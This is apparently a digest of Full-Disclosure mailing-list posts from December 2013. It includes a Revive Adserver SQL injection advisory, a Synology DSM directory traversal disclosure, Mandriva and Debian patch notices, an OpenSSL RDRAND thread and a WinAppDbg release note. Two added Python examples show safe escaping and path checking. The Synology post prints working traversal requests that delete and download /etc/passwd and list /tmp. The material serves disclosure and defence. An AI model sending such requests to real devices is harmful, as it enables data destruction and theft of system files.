[Full-disclosure] [REVIVE-SA-2013-001] Revive Adserver 3.0.2 fixes SQL injection vulnerability
Revive Adserver Security Advisory REVIVE-SA-2013-001

Advisory ID:            REVIVE-SA-2013-001
CVE ID:                 CVE-2013-7149
Date:                   2013-12-20
Security risk:          Critical
Applications affected:  Revive Adserver
Versions affected:      = 3.0.1
Versions not affected:  = 3.0.2
Website:                http://www.revive-adserver.com/

Vulnerability: SQL injection

Description
-----------
An SQL-injection vulnerability was recently discovered and reported to the Revive Adserver team by Florian Sander. The vulnerability is known to be already exploited to gain unauthorised access to the application using brute force mechanisms, however other kinds of attacks might be possible and/or already in use. The risk is rated to be critical as the most common end goal of the attackers is to spread malware to the visitors of all the websites and ad networks that the ad server is being used on.

The vulnerability is also present and exploitable in OpenX Source 2.8.11 and earlier versions, potentially back to phpAdsNew 2.0.x.

Details
-------
The XML-RPC delivery invocation script was failing to escape its input parameters in the same way the other delivery methods do, allowing attackers to inject arbitrary SQL code via the "what" parameter of the delivery XML-RPC methods. Also, the escaping technique used to handle such parameter in the delivery scripts was based on the addslashes PHP function and has now been upgraded to use the dedicated escaping functions for the database in use.

References
----------
http://www.kreativrauschen.com/blog/2013/12/18/zero-day-vulnerability-in-openx-source-2-8-11-and-revive-adserver-3-0-1/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7149

Permalink
---------
http://www.revive-adserver.com/security/REVIVE-SA-2013-001

Solution
--------
We strongly advise people to upgrade to the most recent 3.0.2 version of Revive Adserver, including those running OpenX Source or older versions of the application.

In case the upgrade cannot be performed in a timely fashion, we suggest deleting the www/delivery/axmlrpc.php script (if not in use) as a temporary fix until the application is upgraded.

Contact Information
-------------------
The security contact for Revive Adserver can be reached at: security AT revive-adserver DOT com

--
Matteo Beccati
On behalf of the Revive Adserver Team
http://www.revive-adserver.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
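Why the advisory's move from addslashes to the database's own escaping matters, shown as a round-trip test: this is an added example, not code from the advisory or from Revive Adserver. It assumes SQLite as a stand-in engine that runs offline (its string literals, like PostgreSQL's with standard_conforming_strings on, do not treat backslash as an escape); the function names and sample values are constructed.

```python
import sqlite3

def addslashes(value):
    """Python rendering of PHP addslashes(): backslash before ' " \\ and NUL."""
    table = {"'": "\\'", '"': '\\"', "\\": "\\\\", "\x00": "\\0"}
    return "".join(table.get(ch, ch) for ch in value)

def sqlite_quote(value):
    """Escaping rule of the engine in use in this demo: double the single quote."""
    return value.replace("'", "''")

def literal_round_trip(escape, value, conn):
    """Embed `value` in a string literal via `escape` and read it back.

    Returns the string the database parsed, or the exception class name
    when the escaped text is no longer one well-formed literal.
    """
    sql = "SELECT '" + escape(value) + "'"
    try:
        return conn.execute(sql).fetchone()[0]
    except sqlite3.Error as exc:
        return type(exc).__name__

def bound_round_trip(value, conn):
    """Same lookup with a bound parameter: no escaping step to get wrong."""
    return conn.execute("SELECT ?", (value,)).fetchone()[0]

def compare(values):
    """Return {value: (addslashes result, engine-quote result, bound result)}."""
    conn = sqlite3.connect(":memory:")
    try:
        return {v: (literal_round_trip(addslashes, v, conn),
                    literal_round_trip(sqlite_quote, v, conn),
                    bound_round_trip(v, conn)) for v in values}
    finally:
        conn.close()

# Constructed sample values for a keyword-style parameter.
SAMPLES = ["zone:1", "O'Reilly", "C:\\temp"]

if __name__ == "__main__":
    for value, results in compare(SAMPLES).items():
        print(repr(value), "->", results)
```

With addslashes the quote in the second sample still terminates the literal and the backslash in the third comes back doubled; the engine's own quoting and the bound parameter return every value unchanged.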
[Full-disclosure] Synology DSM multiple directory traversal
**************************************************************
Title: Synology DSM multiple directory traversal
Version affected: = 4.3-3810
Vendor: Synology
Discovered by: Andrea Fabrizi
Email: andrea.fabr...@gmail.com
Web: http://www.andreafabrizi.it
Twitter: @andreaf83
Status: patched
CVE: 2013-6987
**************************************************************

I'm here again with a Synology DSM vulnerability.

Synology DiskStation Manager (DSM) is a Linux-based operating system, used for the DiskStation and RackStation products.

I found a lot of directory traversals in the FileBrowser components. This kind of vulnerability allows any authenticated user, even if not administrative, to access, create, delete and modify system and configuration files.

The only countermeasure implemented against this vulnerability is the check that the path starts with a valid shared folder, so it is enough to put the ../ straight after it to bypass the security check.

Vulnerable CGIs:
- /webapi/FileStation/html5_upload.cgi
- /webapi/FileStation/file_delete.cgi
- /webapi/FileStation/file_download.cgi
- /webapi/FileStation/file_sharing.cgi
- /webapi/FileStation/file_share.cgi
- /webapi/FileStation/file_MVCP.cgi
- /webapi/FileStation/file_rename.cgi

I have not tested all the CGIs, but I guess that many others are vulnerable, so don't take my list as comprehensive.

Some examples follow ("test" is a valid folder name):

- Delete /etc/passwd
==========
POST /webapi/FileStation/file_delete.cgi HTTP/1.1
Host: 192.168.56.101:5000
X-SYNO-TOKEN:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 103
Cookie: stay_login=0; id=kjuYI0HvD92m6
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

path=/test/../../etc/passwd&accurate_progress=true&api=SYNO.FileStation.Delete&method=start&version=1
==========

- Arbitrary file download:
==========
GET /fbdownload/?dlink=2f746573742f2e2e2f2e2e2f6574632f706173737764 HTTP/1.1
Host: 192.168.56.101:5000
Connection: keep-alive
Authorization: Basic
==========

2f746573742f2e2e2f2e2e2f6574632f706173737764 -> /test/../../etc/passwd

- Remote file list:
==========
POST /webapi/FileStation/file_share.cgi HTTP/1.1
Host: 192.168.56.101:5000
X-SYNO-TOKEN:
Content-Length: 75
Cookie: stay_login=0; id=f9EThJSyRaqJM; BCSI-CS-36db57a1c38ce2f6=2

folder_path=/test/../../tmp&api=SYNO.FileStation.List&method=list&version=1
==========

Timeline:
- 05/12/2013: First contact with the vendor
- 06/12/2013: Vulnerability details sent to the vendor
- 20/12/2013: Patch released by the vendor
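The prefix-only share check described in this post, beside a check that normalises the path first, plus a small audit that decodes the hex `dlink` value and the form fields from the post's requests. This is an added example, not code from the post or from Synology; `SHARES`, the function names and the benign sample request are assumptions.

```python
import posixpath
from urllib.parse import parse_qs, urlsplit

SHARES = ("/test",)                    # constructed: "test" is the valid share in the post
PATH_PARAMS = ("path", "folder_path")  # form fields seen in the post's requests

def prefix_only_check(path):
    """The weak check the post describes: the path merely starts with a share."""
    return any(path == s or path.startswith(s + "/") for s in SHARES)

def canonical_check(path):
    """Collapse '.' and '..' first, then require the result to stay in a share.

    normpath() is purely lexical; code that touches a real filesystem should
    compare os.path.realpath() results so symlinks are resolved as well.
    """
    if "\x00" in path or not path.startswith("/"):
        return False
    norm = posixpath.normpath(path)
    return any(norm == s or norm.startswith(s + "/") for s in SHARES)

def candidate_paths(target, body=""):
    """Yield (parameter, decoded path) pairs from a request target and body."""
    for hexval in parse_qs(urlsplit(target).query).get("dlink", []):
        try:
            yield "dlink", bytes.fromhex(hexval).decode("utf-8", "replace")
        except ValueError:
            yield "dlink", hexval      # not hex at all: report the raw value
    form = parse_qs(body)
    for name in PATH_PARAMS:
        for value in form.get(name, []):
            yield name, value

def audit(target, body=""):
    """Return the path parameters that leave every share once normalised."""
    return [(n, p) for n, p in candidate_paths(target, body)
            if not canonical_check(p)]

# Requests from the post ('&' separators assumed) plus one constructed benign request.
SAMPLES = [
    ("/webapi/FileStation/file_delete.cgi",
     "path=/test/../../etc/passwd&api=SYNO.FileStation.Delete&method=start&version=1"),
    ("/fbdownload/?dlink=2f746573742f2e2e2f2e2e2f6574632f706173737764", ""),
    ("/webapi/FileStation/file_share.cgi",
     "folder_path=/test/../../tmp&api=SYNO.FileStation.List&method=list&version=1"),
    ("/webapi/FileStation/file_share.cgi",
     "folder_path=/test/photos/../docs&api=SYNO.FileStation.List&method=list&version=1"),
]

if __name__ == "__main__":
    for target, body in SAMPLES:
        print(target.split("?")[0], "->", audit(target, body) or "ok")
```

The same `audit` function can be run over proxy or web-server logs that record request targets and bodies to find earlier requests of this shape.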
Re: [Full-disclosure] RDRAND used directly when default engines loaded in openssl-1.0.1-beta1 through openssl-1.0.1e
On Mon, Dec 16, 2013 at 7:27 PM, coderman coder...@gmail.com wrote:
> ... what is affected??

fortunately impacts are less than anticipated!

nickm devised most concise fix:

  RAND_set_rand_method(RAND_SSLeay());

always after ENGINE_load_builtin_engines().

https://gitweb.torproject.org/tor.git/commitdiff/7b87003957530427eadce36ed03b4645b481a335

---

full write up is here including a BADRAND engine patch for testing:
https://peertech.org/goodrand

---

last but not least, notable omissions on NSA role in reqs for random number sources in Appendix E: US Government Role in Current Encryption Standards.:
http://cryptome.org/2013/12/nsa-usg-crypto-role.pdf

can we get a do-over?
[Full-disclosure] [ MDVSA-2013:296 ] wireshark
_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2013:296
http://www.mandriva.com/en/support/security/
_______________________________________________________________________

Package : wireshark
Date    : December 20, 2013
Affected: Business Server 1.0, Enterprise Server 5.0
_______________________________________________________________________

Problem Description:

Multiple vulnerabilities were found and corrected in Wireshark:

The dissect_sip_common function in epan/dissectors/packet-sip.c in the SIP dissector in Wireshark 1.8.x before 1.8.12 and 1.10.x before 1.10.4 does not check for empty lines, which allows remote attackers to cause a denial of service (infinite loop) via a crafted packet (CVE-2013-7112).

Multiple buffer overflows in the create_ntlmssp_v2_key function in epan/dissectors/packet-ntlmssp.c in the NTLMSSP v2 dissector in Wireshark 1.8.x before 1.8.12 and 1.10.x before 1.10.4 allow remote attackers to cause a denial of service (application crash) via a long domain name in a packet (CVE-2013-7114).

This advisory provides the latest version of Wireshark (1.8.12) which is not vulnerable to these issues.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7112
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7114
http://www.wireshark.org/security/wnpa-sec-2013-66.html
http://www.wireshark.org/security/wnpa-sec-2013-68.html
_______________________________________________________________________

Updated Packages:

Mandriva Enterprise Server 5
Mandriva Enterprise Server 5/X86_64
Mandriva Business Server 1/X86_64
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
[Full-disclosure] [ MDVSA-2013:297 ] munin
_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2013:297
http://www.mandriva.com/en/support/security/
_______________________________________________________________________

Package : munin
Date    : December 20, 2013
Affected: Business Server 1.0
_______________________________________________________________________

Problem Description:

Updated munin packages fix security vulnerabilities:

The Munin::Master::Node module of munin does not properly validate certain data a node sends. A malicious node might exploit this to drive the munin-html process into an infinite loop with memory exhaustion on the munin master (CVE-2013-6048).

A malicious node, with a plugin enabled using multigraph as a multigraph service name, can abort data collection for the entire node the plugin runs on (CVE-2013-6359).
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6048
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6359
http://advisories.mageia.org/MGASA-2013-0378.html
_______________________________________________________________________

Updated Packages:

Mandriva Business Server 1/X86_64:
b20e89d5a943f0d3deadb324091ab6ef mbs1/x86_64/munin-2.0-0.rc5.3.2.mbs1.noarch.rpm
4ae6191940301c45b1ce7b32fa625122 mbs1/x86_64/munin-master-2.0-0.rc5.3.2.mbs1.noarch.rpm
3a02701b006afcd70430c4de7e96c7e8 mbs1/x86_64/munin-node-2.0-0.rc5.3.2.mbs1.noarch.rpm
d07ea1401e5ab3415c2576281ec60aee mbs1/SRPMS/munin-2.0-0.rc5.3.2.mbs1.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
[Full-disclosure] [SECURITY] [DSA 2825-1] wireshark security update
-------------------------------------------------------------------------
Debian Security Advisory DSA-2825-1                   secur...@debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
December 20, 2013                      http://www.debian.org/security/faq
-------------------------------------------------------------------------

Package        : wireshark
Vulnerability  : several
Problem type   : local(remote)
Debian-specific: no
CVE ID         : CVE-2013-7113 CVE-2013-7114

Laurent Butti and Garming Sam discovered multiple vulnerabilities in the dissectors for NTLMSSPv2 and BSSGP, which could lead to denial of service or the execution of arbitrary code.

For the stable distribution (wheezy), these problems have been fixed in version 1.8.2-5wheezy9.

For the unstable distribution (sid), these problems have been fixed in version 1.10.4-1.

We recommend that you upgrade your wireshark packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
[Full-disclosure] [ MDVSA-2013:298 ] php
_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2013:298
http://www.mandriva.com/en/support/security/
_______________________________________________________________________

Package : php
Date    : December 20, 2013
Affected: Enterprise Server 5.0
_______________________________________________________________________

Problem Description:

A vulnerability has been discovered and corrected in php:

The asn1_time_to_time_t function in ext/openssl/openssl.c in PHP before 5.3.28, 5.4.x before 5.4.23, and 5.5.x before 5.5.7 does not properly parse (1) notBefore and (2) notAfter timestamps in X.509 certificates, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted certificate that is not properly handled by the openssl_x509_parse function (CVE-2013-6420).

The updated packages have been upgraded to the 5.3.28 version which is not vulnerable to this issue.

Additionally, some packages which require so have been rebuilt for php-5.3.28.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6420
http://www.php.net/ChangeLog-5.php#5.3.28
_______________________________________________________________________

Updated Packages:

Mandriva Enterprise Server 5:
[Full-disclosure] WinAppDbg 1.5 is out!
What is WinAppDbg?
==================

The WinAppDbg python module allows developers to quickly code instrumentation scripts in Python under a Windows environment.

It uses ctypes to wrap many Win32 API calls related to debugging, and provides an object-oriented abstraction layer to manipulate threads, libraries and processes, attach your script as a debugger, trace execution, hook API calls, handle events in your debugee and set breakpoints of different kinds (code, hardware and memory). Additionally it has no native code at all, making it easier to maintain or modify than other debuggers on Windows.

The intended audience are QA engineers and software security auditors wishing to test / fuzz Windows applications with quickly coded Python scripts. Several ready to use utilities are shipped and can be used for these purposes.

Current features also include disassembling x86/x64 native code, debugging multiple processes simultaneously and producing a detailed log of application crashes, useful for fuzzing and automated testing.

What's new in this version?
===========================

In a nutshell...

* full 64-bit support (including function hooks!)
* added support for Windows Vista and above.
* database code migrated to SQLAlchemy, tested on:
    + MySQL
    + SQLite 3
    + Microsoft SQL Server
  should work on other servers too (let me know if it doesn't!)
* added integration with more disassemblers:
    + BeaEngine: http://www.beaengine.org/
    + Capstone: http://capstone-engine.org/
    + Libdisassemble: http://www.immunitysec.com/resources-freesoftware.shtml
    + PyDasm: https://code.google.com/p/libdasm/
* added support for postmortem (just-in-time) debugging
* added support for deferred breakpoints
* now fully supports manipulating and debugging system services
* the interactive command-line debugger is now launchable from your scripts (thanks Zen One for the idea!)
* more UAC-friendly, only requests the privileges it needs before any action
* added functions to work with UAC and different privilege levels, so it's now possible to run debugees with lower privileges than the debugger
* added memory search and registry search support
* added string extraction functionality
* added functions to work with DEP settings
* added a new event handler, EventSift, that can greatly simplify coding a debugger script to run multiple targets at the same time
* added new utility functions to work with colored console output
* several improvements to the Crash Logger tool
* integration with already open debugging sessions from other libraries is now possible
* improvements to the Process and GUI instrumentation functionality
* implemented more anti-antidebug tricks
* more tools and code examples, and improvements to the existing ones
* more Win32 API wrappers
* lots of miscellaneous improvements, more documentation and bugfixes as usual!

Where can I find WinAppDbg?
===========================

Project homepage:
-----------------

http://winappdbg.sourceforge.net/

Download links:
---------------

Windows installer (32 bits)
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5.win32.msi/download

Windows installer (64 bits)
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5.win-amd64.msi/download

Source code
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5.zip/download

Documentation:
--------------

Online
http://winappdbg.sourceforge.net/doc/v1.5/tutorial
http://winappdbg.sourceforge.net/doc/v1.5/reference

Windows Help
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5-tutorial.chm/download
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5-reference.chm/download

HTML format (offline)
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5-tutorial.chm/download
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5-reference.chm/download

PDF format (suitable for printing)
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5-tutorial.pdf/download
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5-reference.pdf/download

Acknowledgements
================

Acknowledgements go to Arthur Gerkis, Chris Dietrich, Felipe Manzano, Francisco Falcon, @Ivanlef0u, Jean Sigwald, John Hernandez, Jun Koi, Michael Hale Ligh, Nahuel Riva, Peter Van Eeckhoutte, Randall Walls, Thierry Franzetti, Thomas Caplin, and many others I'm probably forgetting, who helped find and fix bugs in the almost eternal beta of WinAppDbg 1.5! ;)